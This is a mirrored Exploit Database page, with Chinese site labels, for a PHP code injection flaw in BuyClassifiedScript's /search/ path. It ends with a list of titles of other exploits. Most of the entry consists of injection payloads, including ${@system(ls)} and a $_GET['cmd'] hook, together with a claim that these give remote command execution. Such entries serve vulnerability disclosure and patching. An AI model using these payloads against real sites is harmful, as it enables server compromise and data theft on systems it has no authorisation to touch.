BuyClassifiedScript – PHP Code Injection

Exploit Database
32 阅读

作者： d3b4g

日期： 2012-11-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/22929/

# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me


 

----------------------------------------------------------------------------------

 This vulnerabilityallows an attacker to inject custom code
 into the server side scripting engine.It's possible to get a remote cmd by taking
 advantage of this vulnerability.
 
 
 Vulnerable function: 

 /search/ 


 () php code excution :


 http://localhost/path/search {Inject malicious code}


 () example of code you can inject:


 //${@system(ls)}

${@print(hello)}

$_GET['cmd']


 //



-end-

last Exploits
BuyClassifiedScript – PHP Code Injection的更多信息

Joomla! Component JE Quotation Form 1.0b1 – Local File Inclusion：
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Remote Code Execution：
Complaint Management System 4.0 – ‘cid’ SQL injection：
Ganglia Web Frontend < 3.5.1 - PHP Code Execution：
WordPress Plugin social discussions 6.1.1 – Multiple Vulnerabilities：
WordPress Plugin WP-Client 3.8.7 – Persistent Cross-Site Scripting：
T-Dreams Job Seekers Package 3.0 – SQL Injection：
Life Insurance Management System 1.0 – Multiple Stored XSS：